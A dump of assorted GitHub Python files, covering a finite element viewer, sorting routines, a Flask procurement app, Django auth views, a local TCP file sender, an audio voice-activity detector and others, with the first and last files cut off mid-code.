self.ax4.cla()\r\n U = np.reshape(self.U_record[idx, :], (-1, 2)).T\r\n l_u0, = self.ax4.plot(X, U[0])\r\n l_u1, = self.ax4.plot(X, U[1])\r\n l_us, = self.ax4.plot(X, U[1] - U[0])\r\n self.ax4.set_title('displacement and slip')\r\n\r\n self.ax5.cla()\r\n l_eps0, = self.ax5.plot(X_ip, self.eps_record[idx][:, :, 0].flatten())\r\n l_eps1, = self.ax5.plot(X_ip, self.eps_record[idx][:, :, 2].flatten())\r\n self.ax5.set_title('strain')\r\n\r\n self.ax6.cla()\r\n l_sig0, = self.ax6.plot(X_ip, self.sig_record[idx][:, :, 0].flatten())\r\n l_sig1, = self.ax6.plot(X_ip, self.sig_record[idx][:, :, 2].flatten())\r\n self.ax6.set_title('stress')\r\n\r\n self.ax3.set_ylim(np.amin(self.sf_record), np.amax(self.sf_record))\r\n self.ax4.set_ylim(np.amin(self.U_record), np.amax(self.U_record))\r\n# self.ax5.set_ylim(\r\n# np.amin(self.eps_record[:, :, 0::2]), np.amax(self.eps_record[:, :,\r\n# 0::2]))\r\n self.ax6.set_ylim(np.amin(self.sig_record), np.amax(self.sig_record))\r\n\r\n self.figure.canvas.draw()\r\n\r\n view = View(HSplit(Item('figure', editor=MPLFigureEditor(),\r\n dock='vertical', width=0.9, height=0.9),\r\n VGroup(Group(Item('K_bar'),\r\n Item('H_bar'),\r\n Item('E_b'),\r\n label='Hardening modulus', show_labels=True, show_border=True),\r\n Item('time'),\r\n Group(Item('mats_eval'),\r\n # Item('fets_eval'),\r\n Item('time_stepper'),\r\n Item('time_loop'),\r\n show_border=True),\r\n Item('update', show_label=False),\r\n ),\r\n show_labels=False),\r\n resizable=True,\r\n height=0.9, width=1.0,\r\n )\r\n\r\nif __name__ == '__main__':\r\n\r\n ts = TStepper(L_x=100.)\r\n n_dofs = ts.domain.n_dofs\r\n# d_array = np.array(\r\n# [0., 5910., 1440., 7877., 1542., 9869., 1338., 11964., 955., 13420.])\r\n# d_array = np.array(\r\n# [0., 5910., 1440.])\r\n d_array = np.array(\r\n [0., 1.04, 0.98, 2.01, 1.93, 3.02, 2.905, 4.03, 3.875, 5.5])\r\n\r\n dd_arr = np.abs(np.diff(d_array))\r\n x = np.hstack((0, np.cumsum(dd_arr) / sum(dd_arr)))\r\n tf = interp1d(x, d_array)\r\n\r\n ts.bc_list = [BCDof(var='u', dof=n_dofs - 2, value=0.0),\r\n BCDof(var='u', dof=n_dofs - 1, value=1., time_function=tf)]\r\n\r\n tl = TLoop(ts=ts, d_t=0.002)\r\n\r\n# U_record, F_record, sf_record, t_record, eps_record, sig_record = tl.eval()\r\n#\r\n# plt.plot(U_record[:, n_dofs - 1],\r\n# F_record[:, n_dofs - 1], 'k', alpha=0.5)\r\n# plt.xlabel('displacement')\r\n# plt.ylabel('force')\r\n# fpath = 'D:\\\\data\\\\pull_out\\\\all\\\\DPO-20cm-0-3300SBR-V3_R3_f.asc'\r\n# d, f = np.loadtxt(fpath, delimiter=';')\r\n# plt.plot(d[d <= 11.] / 2., f[d <= 11.] * 1000., 'k--')\r\n# plt.xlim(0,)\r\n# plt.ylim(0,)\r\n# plt.show()\r\n\r\n window = Mainwindow(mats_eval=ts.mats_eval,\r\n time_stepper=ts,\r\n time_loop=tl)\r\n window.draw()\r\n\r\n window.configure_traits()\r\n","repo_name":"liyingxiong/scratch","sub_path":"scratch/calibration_unloading/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":9082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35550674691","text":"import random as rd\nfrom time import clock\nimport sys\n\narr = [rd.randint(1,897) for i in range(12)]\n\ndef qsort(arr):\n if not arr: return arr\n left = [i for i in arr[1:] if i<=arr[0]]\n right = [i for i in arr[1:] if i>arr[0]]\n return qsort(left)+[arr[0]]+qsort(right)\n\ndef insertion(arr):\n n = len(arr)\n for i in range(n):\n ind = i\n for j in range(i,n):\n if arr[j] List[Union[str, int]]: # mengubah csv ke list in list\r\n i = 0\r\n j = 0\r\n\r\n csv_list = [[None for k in range(collumns)] for i in range(row)]\r\n with open(csv_path, 'r') as csv: # melakukan read pada file csv\r\n kata = ''\r\n while True:\r\n huruf = csv.read(1) # membaca huruf satu per satu\r\n if huruf == \";\":\r\n if kata.isdigit(): # mengecek apabila string hanya mengandung angka saja\r\n kata = int(kata) # string dijadikan integer\r\n csv_list[i][j] = kata # dimasukan ke csv list\r\n kata = ''\r\n j += 1\r\n elif huruf == \"\\n\": # apabila membuat baris baru/ baris sudah habis\r\n if kata.isdigit():\r\n kata = int(kata)\r\n csv_list[i][j] = kata\r\n kata = ''\r\n j = 0\r\n i += 1\r\n elif huruf == \"\": # apabila sudah tidak ada lagi sesuatu di csv\r\n if kata.isdigit():\r\n kata = int(kata)\r\n csv_list[i][j] = kata\r\n break\r\n else:\r\n kata += huruf # huruf dimasukkan ke kata\r\n return csv_list\r\n","repo_name":"akmalrmn/Tubes-Daspro","sub_path":"csvtolist.py","file_name":"csvtolist.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7582712499","text":"import os\nimport ConfigParser\nimport logging\nimport logging.config\n\nfrom logging.handlers import RotatingFileHandler\n\nfrom flask import Flask\n\nfrom utils.utils import Utils\n\n# Create utils instance.\nutils = Utils()\n\ndef create_app():\n ''' Create the Flask app.\n '''\n # Create the Flask app.\n app = Flask(__name__)\n\n # Load application configurations\n load_config(app)\n\n # Configure logging.\n configure_logging(app)\n\n # Register URL rules.\n register_url_rules(app)\n\n return app\n\n\ndef load_config(app):\n ''' Reads the config file and loads configuration properties into the Flask app.\n :param app: The Flask app object.\n '''\n\n # Get the path to the application directory, that's where the config file resides.\n par_dir = os.path.join(__file__, os.pardir)\n par_dir_abs_path = os.path.abspath(par_dir)\n app_dir = os.path.dirname(par_dir_abs_path)\n\n # Read config file\n # FIXME: Use the \"common pattern\" described in \"Configuring from Files\": http://flask.pocoo.org/docs/config/\n config = ConfigParser.RawConfigParser()\n config_filepath = app_dir + '/config.cfg'\n config.read(config_filepath)\n\n # Set up config properties\n app.config['SERVER_PORT'] = config.get('Application', 'SERVER_PORT')\n app.config['BASE_PATH'] = config.get('Application', 'BASE_PATH')\n\n app.config['API_GJAKOVA_PROCUREMENT'] = config.get('Api', 'API_GJAKOVA_PROCUREMENT')\n\n # Logging path might be relative or starts from the root.\n # If it's relative then be sure to prepend the path with the application's root directory path.\n log_path = config.get('Logging', 'PATH')\n if log_path.startswith('/'):\n app.config['LOG_PATH'] = log_path\n else:\n app.config['LOG_PATH'] = app_dir + '/' + log_path\n\n app.config['LOG_LEVEL'] = config.get('Logging', 'LEVEL').upper()\n\n\ndef configure_logging(app):\n\n # Get the path of the log from the config\n log_path = app.config['LOG_PATH']\n\n # Get the level of logging from the config\n log_level = app.config['LOG_LEVEL']\n\n # If path directory doesn't exist, create it.\n log_dir = os.path.dirname(log_path)\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n # Create formatter\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # Create Log_Handler\n log_handler = RotatingFileHandler(log_path, maxBytes=250000, backupCount=5)\n\n # add formatter to log handler\n log_handler.setFormatter(formatter)\n\n # Get the level of the Debug and set it to the logger\n app.logger.setLevel(log_level)\n\n # Add the handlers to the logger\n app.logger.addHandler(log_handler)\n\n # Test if the logging is working by typing this string to a file.\n app.logger.info('Logging to: %s', log_path)\n\n\n# Views for JSON requests\nfrom views.json.budgettype import BudgetType\nfrom views.json.procurementtype import ProcurementType\nfrom views.json.treemap import TreeMap\nfrom views.json.treemapprice import TreeMapPrice\nfrom views.json.vleracmimi import VleraCmimi\nfrom views.json.municipalityvleracmimi import MunicipalityVleraCmimi\nfrom views.json.redflags import RedFlagsJson\nfrom views.json.map import MapJson\nfrom views.json.company_dir_json import CompanyDirectory\nfrom views.json.company_details import CompanyDetails\n\n# Views for Page rendering\nfrom views.pages.index import Index\nfrom views.pages.distribution import Distribution\nfrom views.pages.typedistribution import TypeDistribution\nfrom views.pages.map import Map\nfrom views.pages.procurementdistribution import ProcurementDistribution\nfrom views.pages.municipalityPriceValue import MunicipalityPriceValue\nfrom views.pages.redflags import RedFlags\nfrom views.pages.company_dir_pages import CompanyDir\nfrom views.pages.company_details_page import CompanyDetailsPage\nfrom views.pages.about_page import AboutPage\n\n\n\ndef register_url_rules(app):\n ''' Register URLs\n :param app: The Flask application instance.\n '''\n # Register the URL rules for JSON requests.\n register_json_url_rules(app)\n\n # Register the URL rules for page requests.\n register_page_url_rules(app)\n\n\ndef register_json_url_rules(app):\n ''' Register the URL rules for JSON requests.\n :param app: The Flask application instance.\n '''\n app.add_url_rule(\n '/json/buxheti//',\n view_func=BudgetType.as_view('budget_type_json'))\n\n app.add_url_rule(\n '/json/buxheti/',\n view_func=BudgetType.as_view('budget_type_company_json'))\n\n app.add_url_rule(\n '/json/prokurimi//',\n view_func=ProcurementType.as_view('procurement_type_json'))\n\n\n app.add_url_rule(\n '/json/prokurimi/',\n view_func=ProcurementType.as_view('procurement_company_type_json'))\n\n app.add_url_rule(\n '/json/monthly-summary/',\n view_func=MunicipalityVleraCmimi.as_view('municipality_vlera_cmimi_json'))\n\n app.add_url_rule(\n '/json/monthly-summary//',\n view_func=VleraCmimi.as_view('vlera_cmimi_json'))\n\n app.add_url_rule(\n '/json/monthly-summary/',\n view_func=VleraCmimi.as_view('vlera_cmimi_json_company'))\n\n app.add_url_rule(\n '/json//map/',\n view_func=MapJson.as_view('map_view_json'))\n\n app.add_url_rule(\n '/json//red-flags/',\n view_func=RedFlagsJson.as_view('red_flags_json'))\n\n app.add_url_rule(\n '/json//red-flags//',\n view_func=RedFlagsJson.as_view('red_flags_json_selia'))\n\n # Get JSON for TreeMap\n app.add_url_rule(\n '/json//treemap/',\n view_func=TreeMap.as_view('treemap_json'))\n\n app.add_url_rule(\n '/json//treemap/price/',\n view_func=TreeMapPrice.as_view('treemap_price_json'))\n\n app.add_url_rule(\n '/json/kompanite/kerko/',\n view_func=CompanyDirectory.as_view('company_dir_json'))\n\n app.add_url_rule(\n '/json/kompanite/',\n view_func=CompanyDetails.as_view('company_details_json'))\n\n\ndef register_page_url_rules(app):\n ''' Register the URL rules for page requests.\n :param app: The Flask application instance.\n '''\n # Index.\n app.add_url_rule(\n '/',\n view_func=Index.as_view('index'))\n\n app.add_url_rule(\n '/kompanite',\n view_func=CompanyDir.as_view('company-directory'))\n\n #app.add_url_rule(\n # '/kompania/',\n # view_func=CompanyDetails.as_view('company_details'))\n\n app.add_url_rule(\n '//shperndarja',\n view_func=Distribution.as_view('distibution'))\n\n # Contract Distribution Amongst Companies\n app.add_url_rule(\n '//shperndarja/perfituesit',\n view_func=ProcurementDistribution.as_view('procurement_distribution'))\n\n # Budget/Procurement Type\n app.add_url_rule(\n '//shperndarja/',\n view_func=TypeDistribution.as_view('type_distribution'))\n\n # Map Page:\n app.add_url_rule(\n '//harta',\n view_func=Map.as_view('maps'))\n\n app.add_url_rule(\n '//red-flags',\n view_func=RedFlags.as_view('redflags'))\n\n app.add_url_rule(\n '/kompanite/',\n view_func=CompanyDetailsPage.as_view('company_details'))\n\n\n app.add_url_rule(\n '/krahasimi',\n view_func=MunicipalityPriceValue.as_view('municipality_price_value'))\n\n # About page:\n app.add_url_rule(\n '/per-projektin',\n view_func=AboutPage.as_view('about'))\n","repo_name":"opendatakosovo/e-prokurimi","sub_path":"gpv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42712490528","text":"import numpy as np\nimport pandas as pd \nimport sys\n\npop = sys.argv[1]\nnumChannels = int(sys.argv[2])\nrho = float(sys.argv[3]) #ninth field in populations.txt\n\nto_data = '../sims/' + pop + '/'\nto_training_data = to_data + 'trainingData/'\n\n# load data\nfvecs = pd.read_csv(to_data + 'fvecs.tsv', header=None, sep='\\t')\nparams = pd.read_csv(to_data + 'params.tsv', header=None, sep='\\t')\nalpha_values = pd.read_csv(to_data + 'alpha_values.tsv', header=None, sep=' ')\n\n\nnumSims = alpha_values.shape[0]\nkeep_indices = [i for i in range(numSims) if np.max(alpha_values.values[i,:]) < 3.2e5]\nprint('number of indices to retain: ', len(alpha_values.values[keep_indices,1]))\nmean_alpha = np.mean(alpha_values.values[keep_indices,:].flatten())\nprint('mean alpha over rho: ', mean_alpha/rho)\n\n# from shape and scale params compute moments of alpha distributions\nparams.columns = ['shape', 'scale']\nmean = params.loc[keep_indices, 'shape']*params.loc[keep_indices, 'scale']\nstdev = np.sqrt(params.loc[keep_indices, 'shape'])*params.loc[keep_indices, 'scale']\n\n# log transform then standardize moments\nlogMean = np.log(mean)\nlogStDev = np.log(stdev)\nlogMoments = pd.DataFrame({'logMean':logMean, 'logStDev':logStDev})\nstandardizedLogMoments = (logMoments - logMoments.mean())/logMoments.std()\n\n# save moments for output\nlogM = logMoments.mean().values\nlogSD = logMoments.std().values\nnp.save(to_training_data + 'center.npy', logM)\nnp.save(to_training_data + 'scale.npy', logSD)\n\n# turn fvecs into 4d tensor of image matrices\ndef get_images(fvecs, numSims):\n \"\"\"Takes data that has feature vectors\n on each row and returns them as 4d np array\n with dimension (numSims, numRows, numCols, numChannels)\"\"\"\n result = np.empty((numSims, 12, 25, numChannels))\n for j in range(numSims):\n for k in range(numChannels):\n result[j,:,:,k] = fvecs.iloc[[numChannels*j+k]].values.reshape(12,25)\n return(result)\n\n# save fvecs\nimages = get_images(fvecs, numSims)\nnp.save(to_training_data + 'fvecs.npy', images)\nnp.save(to_training_data + 'targets.npy', standardizedLogMoments)\n","repo_name":"mattlukac/alpha-inference","sub_path":"pipeline/2-save_training_data.py","file_name":"2-save_training_data.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36847426851","text":"from django.shortcuts import render, redirect\nfrom management.forms import UserCreateForm, ProfileEditForm, UserEditForm\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\n\ndef signupuser(request):\n \"\"\"Create User\"\"\"\n if request.method == \"POST\":\n form = UserCreateForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n email = form.cleaned_data.get('email')\n first_name = form.cleaned_data.get('first_name')\n last_name = form.cleaned_data.get('last_name')\n password = form.cleaned_data.get('password')\n address = form.cleaned_data.get('address')\n website = form.cleaned_data.get('website')\n linked_in = form.cleaned_data.get('linked_in')\n instagram = form.cleaned_data.get('instagram')\n twitter = form.cleaned_data.get('twitter')\n message = messages.success(request, \n f'User has been created')\n return redirect('management:signupuser')\n else:\n form = UserCreateForm()\n return render(request, 'management/signupuser.html', {'form':form})\n\ndef loginuser(request):\n \"\"\"Login functionallity of the page\"\"\"\n if request.method == 'GET':\n return render(request, \n 'management/loginuser.html',\n {'form':AuthenticationForm()}\n )\n else:\n user = authenticate(request,\n username=request.POST['username'],\n password=request.POST['password']\n )\n if user is None:\n return render(request,\n 'management/loginuser.html',\n {'form':AuthenticationForm(),\n 'error':'Username or Password is incorrect'}\n )\n else:\n login(request, user)\n return redirect('management:home')\n \n@login_required \ndef logoutuser(request):\n \"\"\"Logout functionallity of the page\"\"\"\n if request.method == \"GET\":\n logout(request)\n message = messages.success(request, \n f'You are successfully logout!'\n )\n return render(request,\n 'management/logoutuser.html'\n )\n \n \ndef home(request):\n \"\"\"Show the Home page\"\"\"\n return render(request, 'management/home.html')\n\n\n@login_required\ndef myprofile(request):\n return render(request, 'management/myprofile.html')\n \n\n@login_required\ndef updateprofile(request):\n if request.method == \"POST\":\n u_form = UserEditForm(request.POST, instance=request.user)\n p_form = ProfileEditForm(request.POST, request.FILES, instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n message = messages.success(request, f'Succesfully updated your profile')\n return redirect('management:myprofile')\n else:\n u_form = UserEditForm(instance=request.user)\n p_form = ProfileEditForm(instance=request.user.profile)\n context = {'u_form': u_form, 'p_form': p_form}\n \n return render(request, 'management/updateprofile.html', context)\n\n\n","repo_name":"ianmanalo1026/PhotoGallery","sub_path":"management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2360989405","text":"import os\nimport socket\nimport struct\nimport os\nimport json\n\nsk = socket.socket()\nsk.connect(('127.0.0.1', 9001))\n\nfilepath = '/pyBasic/网络编程总结及回顾/tcp协议发送大文件到服务端/3.并发部分的概念.mp4'\nfilesize = os.path.getsize(filepath)\nfilename = os.path.basename(filepath)\n\nfile_dic = {'filename':filename, 'filesize':filesize}\nfile_dic = json.dumps(file_dic).encode('utf-8')\nblen_dic = struct.pack('i', len(file_dic))\nsk.send(blen_dic)\nsk.send(file_dic)\n\nwith open(filepath, mode='rb') as f:\n while filesize >= 1024:\n content = f.read(1024)\n sk.send(content)\n filesize -= len(content)\n else:\n content = f.read()\n sk.send(content)\n","repo_name":"zhengew/xiaoBaiJuJia","sub_path":"pyBasic/网络编程总结及回顾/tcp协议发送小文件到服务端/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"33774376231","text":"def solution(array, commands):\n answer = []\n for com in commands:\n start, end, selected_idx = com\n selected_array = array[start-1:end]\n sorted_array = sorted(selected_array)\n answer.append(sorted_array[selected_idx-1])\n return answer\n\n\ntest_case = [\n [1, 5, 2, 6, 3, 7, 4], [[2, 5, 3], [4, 4, 1], [1, 7, 3]], [5, 6, 3]\n]\n\nres = solution(test_case[0], test_case[1])\nprint(\"------result------\")\nprint(res)\nif res == test_case[-1]:\n print(\"goood\")\nelse:\n print(\"fail \")\n","repo_name":"bearics/coding-test","sub_path":"pro-42748.py","file_name":"pro-42748.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41319933829","text":"\"\"\"empty message\n\nRevision ID: f3bdf790db9b\nRevises: f176760dc9f9\nCreate Date: 2020-05-28 13:12:37.028837\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f3bdf790db9b'\ndown_revision = 'f176760dc9f9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('Customer', 'stripe_customer_id')\n op.add_column('User', sa.Column('stripe_customer_id', sa.String(length=255), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('User', 'stripe_customer_id')\n op.add_column('Customer', sa.Column('stripe_customer_id', sa.VARCHAR(length=255), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n","repo_name":"dragonmaster-alpha/Charity-App","sub_path":"pr412-my-charity-change-backend-python/migrations/versions/f3bdf790db9b_.py","file_name":"f3bdf790db9b_.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6152964044","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom kodos.version import VERSION\nfrom setuptools import setup\nfrom setuptools.command.build_ext import build_ext\nimport os\nimport sys\nfrom glob import glob\nimport subprocess\n\nargs = sys.argv[1:]\n\nif sys.platform == 'win32':\n# libpath = '.\\\\'\n libpath = r\"lib\\site-packages\\kodos\"\nelse:\n libpath = \"/usr/share/kodos\"\n\nfor arg in args:\n if arg == \"--formats=wininst\":\n libpath = \"kodos\"\n break\n\nHELP_DIR = os.path.join(libpath, \"help\")\nHELP_PY_DIR = os.path.join(libpath, \"help\", \"python\")\nIMAGES_DIR = os.path.join(libpath, \"images\")\nSCREENSHOTS_DIR = os.path.join(libpath, \"screenshots\")\nTRANSLATIONS_DIR = os.path.join(libpath, \"translations\")\n\nclass Build(build_ext):\n def run(self):\n subprocess.check_call(['make'])\n build_ext.run(self)\n\nsetup(name=\"kodos\",\n version=VERSION,\n description=\"Kodos is a visual regular expression editor\",\n author=\"Phil Schwartz\",\n author_email=\"phil_schwartz@users.sourceforge.net\",\n url=\"http://kodos.sourceforge.net\",\n entry_points={\n 'gui_scripts': ['kodos = kodos.py']\n },\n packages=['kodos'],\n data_files=[(HELP_DIR, glob(os.path.join(\"help\", \"*.*ml\"))),\n (HELP_PY_DIR, glob(os.path.join(\"help\", \"python\", \"*.html\"))),\n (IMAGES_DIR, glob(os.path.join(\"images\", \"*.png\"))),\n (SCREENSHOTS_DIR, glob(os.path.join(\"screenshots\", \"*.png\"))),\n (TRANSLATIONS_DIR, glob(os.path.join(\"translations\", \"*\"))),\n ],\n license=\"GPL\",\n long_description=\"\"\"\n Kodos is a visual regular expression editor and debugger.\n \"\"\",\n cmdclass={'build_ext': Build},\n )\n","repo_name":"majojoe/kodos","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"23922681712","text":"# Medium 285. Inorder Successor in BST\n# Given the root of a binary search tree and a node p in it, return the in-order successor of that node in the BST.\n# If the given node has no in-order successor in the tree, return null.\n# The successor of a node p is the node with the smallest key greater than p.val\n# !!! All Nodes will have unique values !!!\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val, self.left, self.right = val, left, right\n\nclass Solution:\n def inorderSuccessor(self, root, p):\n if p.right: return self.to_leftmost(node=p.right)\n return self.find_ancestor(root, p)\n\n def find_ancestor(self, root, p):\n curr, anc = root, None\n while curr != p:\n if p.val < curr.val: anc, curr = curr, curr.left\n elif curr.val < p.val: curr = curr.right\n return anc\n\n def to_leftmost(self, node):\n lm = node\n while lm.left: lm = lm.left\n return lm\n\n########## TEST ########################################################################################################\nsln = Solution()\nroot = TreeNode(5, TreeNode(3, TreeNode(2), TreeNode(4)), TreeNode(9))\nfor p in [root.right, root, root.left, root.left.left, root.left.right]:\n res = sln.inorderSuccessor(root, p)\n print(res.val if res else None)\n","repo_name":"Romzes/HappyLC","sub_path":"MainProject/Explore/Learn/17_BinarySearchTree_BST/2_Medium/InorderStep/00285_InorderSuccessor.py","file_name":"00285_InorderSuccessor.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35064223348","text":"from collections import Counter,defaultdict\n\nclass Solution:\n def countCharacters(self, words, chars):\n if not words:\n return 0\n if not chars:\n return sum(map(lambda s: len(s), words))\n allowed_chars = Counter(list(chars))\n total_len = 0\n for word in words:\n freq = defaultdict(int)\n permit = True\n for ch in word:\n freq[ch] += 1\n if ch not in allowed_chars or freq[ch] > allowed_chars[ch]:\n permit = False\n break\n if permit:\n total_len += len(word)\n return total_len\n\n\nsol = Solution()\nprint(sol.countCharacters(words = [\"cat\",\"bt\",\"hat\",\"tree\"], chars = \"atach\"))\n\n","repo_name":"joestalker1/leetcode","sub_path":"src/main/scala/mock/05012020/CountCharacters.py","file_name":"CountCharacters.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14244193626","text":"# 백준 9020번 골드바흐의 추측 문제\nsieve = list(range(2, 10001))\nfor i in range(2, 10001):\n if sieve[i]:\n for t in range(i+i, 10001, i):\n if sieve[t]:\n sieve[t] = 0\nsieve = [i for i in sieve if i]\nfor _ in range(int(input())):\n\ttmin, tmax = -1e9, 1e9\n\tn = int(input())\n\tfor i in range(2, n//2+1):\n\t\tif i in sieve:\n\t\t\tif n-i in sieve:\n\t\t\t\tif tmax-tmin > n-i - i:\n\t\t\t\t\ttmax, tmin = n-i, i\n\tprint(tmin, tmax)","repo_name":"VESOC/BOJ-Solutions","sub_path":"9020.py","file_name":"9020.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38460819095","text":"# -*- coding: utf-8 -*-\r\n# Andrea Castiella Aguirrezabala\r\n# Algoritmo para la detección de voz\r\n\r\nimport numpy as np\r\nimport statistics\r\nimport pyaudio\r\n\r\n# Detección de voz\r\ndef VAD(frames):\r\n speech = None\r\n Energy_PrimThresh = 40\r\n F_PrimThresh = 185\r\n SF_PrimThresh = 5\r\n silenceCount = 0\r\n speechCount = 0\r\n\r\n for frame in frames:\r\n Ei = shortTermEnergy(frame)\r\n Fi = dominantFrequency(frame)\r\n SFMi = SFM(frame)\r\n\r\n E_min = np.min(Ei)\r\n F_min = np.min(Fi)\r\n SF_min = np.min(SFMi)\r\n\r\n Thresh_E = Energy_PrimThresh*np.log10(E_min)\r\n Thresh_F = F_PrimThresh\r\n Thresh_SF = SF_PrimThresh\r\n\r\n count = 0\r\n\r\n if (Ei - E_min) >= Thresh_E:\r\n count += 1\r\n if (Fi - F_min) >= Thresh_F:\r\n count += 1\r\n if (SFMi - SF_min) >= Thresh_SF:\r\n count += 1\r\n\r\n if count > 1:\r\n speechCount += 1\r\n silenceCount = 0\r\n else:\r\n E_min = (silenceCount*E_min + Ei) / (silenceCount + 1)\r\n silenceCount += 1\r\n speechCount = 0\r\n Thresh_E = Energy_PrimThresh*np.log10(E_min)\r\n\r\n if speechCount >= 5:\r\n speech = True\r\n\r\n return speech\r\n\r\n\r\n# Cálculo de la energía a corto plazo\r\ndef shortTermEnergy(frame):\r\n return sum([abs(x) ** 2 for x in frame]) / len(frame)\r\n\r\n\r\n# Cálculo de la frecuencia dominante\r\ndef dominantFrequency(frame, CHUNK = 480, RATE = 48000):\r\n fft_wave = np.fft.fft(frame)\r\n idx = np.argmax(abs(fft_wave))\r\n freq = np.fft.fftfreq(CHUNK, 1)\r\n return abs(RATE*freq[int(idx)])\r\n\r\n\r\n# Cálculo medida de planitud espectral\r\ndef SFM(frame, CHUNK=480):\r\n fft_wave = np.zeros(CHUNK)\r\n fft_wave = abs(np.fft.fft(frame))\r\n am = statistics.mean(fft_wave)\r\n gm = statistics.geometric_mean(fft_wave)\r\n return 10*np.log10(gm/am)\r\n\r\n\r\n# Ejemplo main para detección voz\r\n\r\n'''\r\n# Constantes e inicialización pyaudio\r\nCHUNK = 480 # Tamaño en muestras almacenadas en cada array. 10 ms para detección voz.\r\nRATE = 48000 # Muestras por segundo\r\np = pyaudio.PyAudio()\r\nstream = p.open(format=pyaudio.paFloat32, rate=RATE, channels=1, input=True, input_device_index=2,\r\n frames_per_buffer=CHUNK) # Input Device = 0 si ordenador, 1 si cascos, 2 si Raspberry\r\n\r\n\r\ndef captarAudio(corr_factor = 4.73):\r\n # Almacenar audio en array\r\n data = np.frombuffer(stream.read(CHUNK, exception_on_overflow=False), dtype=np.float32)\r\n # Factor de corrección del dispositivo que está siendo utilizado para captar la señal. 94 dB a 1 kHz 1 Pa de referencia.\r\n data = data * corr_factor\r\n return data\r\n\r\ntry:\r\n # Bucle para captar audio de forma continua\r\n N = 0\r\n frames = []\r\n while True: \r\n # Captación audio\r\n data = captarAudio()\r\n frames.append(data)\r\n N += 1\r\n\r\n if N == 50:\r\n \tspeech = VAD(frames)\r\n \tif speech:\r\n \t\tprint('Voz detectada')\r\n \telse:\r\n \t\tprint('Silencio')\r\n \tN=0\r\n \tframes=[]\r\n\r\n# Salir del bucle con ctr+c\r\nexcept KeyboardInterrupt:\r\n # Cierre stream\r\n stream.stop_stream()\r\n stream.close()\r\n p.terminate\r\n print('Interrupción de teclado. Finalizando programa.')\r\n sys.exit()\r\n'''","repo_name":"AndreaCastiella/PsychoacousticParametersMeasurer","sub_path":"VAD.py","file_name":"VAD.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"es","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"13175943335","text":"########################################################################################################################\n# This is class to create all the objects for the experiment\n########################################################################################################################\n\n########################################\n# Imports #\n########################################\nfrom psychopy import visual\nfrom random import choice, shuffle\nfrom popChoice import popChoice\n########################################\n\n\n########################################\n# Stimuli #\n########################################\nclass Stimuli:\n def __init__(self, window):\n self.window = window # The psychopy window we are using\n\n self.pathToImages = \"resources/\" # where we put the images\n\n # the different objects (needs the be the same names as the images)\n self.objectNames = [\"key\", \"light\", \"phone\", \"stove\"]\n self.objectImages = {} # preparing to create the images\n self.objectSize = self.window.screen[\"quarterHeight\"] # square of the quarter of the size\n self.positionRectColour = [.5, .5, .5] # a light grey\n\n # the different rooms (needs the be the same names as the images)\n self.roomNames = [\"pink\", \"blue\", \"green\", \"brown\"]\n self.roomImages = {} # preparing to create the images\n self.roomSize = self.window.screen[\"height\"] * .90 # Squares taking up most of the screen\n\n self.allImages = {} # preparing to create the images\n\n # Preparing to record all the different combinations\n self.combiRoomsOfTheObjects = {} # each object will be a key for a list with its two rooms\n self.combiObjectsOfTheRooms = {} # each room will be a key for a list with its two objects\n\n # Creating a position rectangle for the objects (so that they are all in the same colour square when presented)\n self.positionRect = visual.Rect(\n win=self.window,\n units=\"pix\",\n width=self.objectSize,\n height=self.objectSize,\n fillColor=self.positionRectColour,\n lineColor=self.positionRectColour)\n\n # Creating an empty rectangle with a border that surrounds the objects in the trials\n self.selectionContainer = visual.Rect(\n win=self.window,\n 